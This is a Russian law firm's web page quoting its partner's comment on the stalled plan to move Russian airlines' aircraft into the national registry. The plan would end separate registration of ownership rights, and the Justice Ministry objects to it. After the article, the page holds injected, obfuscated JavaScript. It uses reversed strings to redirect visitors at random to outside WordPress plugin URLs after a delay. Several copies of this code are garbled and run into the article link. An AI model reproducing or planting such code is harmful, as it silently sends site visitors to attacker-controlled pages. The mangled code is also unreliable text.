Палки в крылья: почему забуксовал проект по переводу самолетов в нацреестр. В отрасли пока не спешат перерегистрировать воздушные суда в России

Комментарий Юрия Аксёнова, партнёра Orchards, для газеты «Известия».

Как пишут «Известия», перевод самолетов российских авиакомпаний в национальный реестр может затормозиться. Минюст раскритиковал проект Министерства транспорта, который предлагает отменить требования регистрировать права собственности на воздушные суда, оставив только положение о регистрации самих самолетов. В Минтрансе сочли, что эти два требования дублируют друг друга: весомей сконцентрироваться на втором, так как владельцы самолетов пока предпочитают регистрации в российской юрисдикции Бермуды и Ирландию из-за налоговых льгот и понятной процедуры оформления. В Минюсте же считают, что мера затруднит оборот самолетов и приведет к судебным спорам.

По мнению Минюста, разработанные Минтрансом поправки приведут «к ряду неблагоприятных правовых последствий», связанных со сделками с самолетами, говорится в заключении, с которым ознакомились «Известия». «Свидетельство о регистрации воздушного судна выдается только для целей регистрации и не удостоверяет право собственности на самолет», — уточняет ведомство в своем отзыве.

В Минюсте полагают, что поправки затруднят оборот воздушных судов и приведут к новым судебным спорам. Например, из-за того, что самолеты больше не будут считаться недвижимостью, могут возникать ситуации, когда брошенное воздушное судно попадет в собственность третьих лиц, говорится в заключении ведомства. У владельцев самолетов могут возникнуть вопросы о подсудности этих споров.

Партнёр Orchards Юрий Аксёнов отметил, что наделение воздушного судна правовым режимом движимой вещи не ослабит защищенность участников рынка, а, наоборот, освободит их от избыточных процедур. «Оборот наземных транспортных средств, включая дорогостоящие автомобили, карьерные самосвалы и скоростные поезда, нисколько не страдает от того, что закон не рассматривает их в качестве недвижимости», — замечает он.

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tov-v-natcreestr?fbclid=IwAR2xPsDK_QUGPLfdo-FJhibfWF9Fit4knX4aJNTUa3FKiWj9wJNks6TPy-M»>Читать статью целиком>>

Подпишитесь на Telegram Orchards

X